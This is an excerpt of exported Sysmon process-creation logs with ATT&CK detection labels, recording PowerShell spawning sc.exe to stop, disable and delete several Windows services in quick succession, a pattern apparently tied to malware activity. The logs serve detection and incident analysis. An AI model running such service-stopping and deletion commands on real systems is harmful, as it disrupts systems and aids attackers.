NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.042"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010da192600}"",""processId"":""7788"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:19:24.369",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.977 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010da152600} +ProcessId: 8080 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.981538500Z"",""eventRecordID"":""2915"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.977\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010da152600}\r\nProcessId: 8080\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration 
Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.977"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010da152600}"",""processId"":""8080"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.355",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.955 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-001003142600} +ProcessId: 5296 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config RpcEptManger Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config RpcEptManger Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.957550400Z"",""eventRecordID"":""2914"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.955\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-001003142600}\r\nProcessId: 5296\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config RpcEptManger Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.955"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-001003142600}"",""processId"":""5296"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config RpcEptManger Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.322",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.924 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d2112600} +ProcessId: 7976 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.927955600Z"",""eventRecordID"":""2912"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.924\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d2112600}\r\nProcessId: 7976\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:55.924"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010d2112600}"",""processId"":""7976"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.276",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.879 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d00b2600} +ProcessId: 7592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp64 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.881601500Z"",""eventRecordID"":""2909"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.879\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d00b2600}\r\nProcessId: 7592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.879"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010d00b2600}"",""processId"":""7592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.229",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.849 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d3072600} +ProcessId: 3648 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinHelp32 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.853525200Z"",""eventRecordID"":""2907"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.849\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d3072600}\r\nProcessId: 3648\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.849"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010d3072600}"",""processId"":""3648"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.213",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.835 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-001017062600} +ProcessId: 4348 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.838128200Z"",""eventRecordID"":""2906"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.835\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-001017062600}\r\nProcessId: 4348\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.835"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-001017062600}"",""processId"":""4348"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 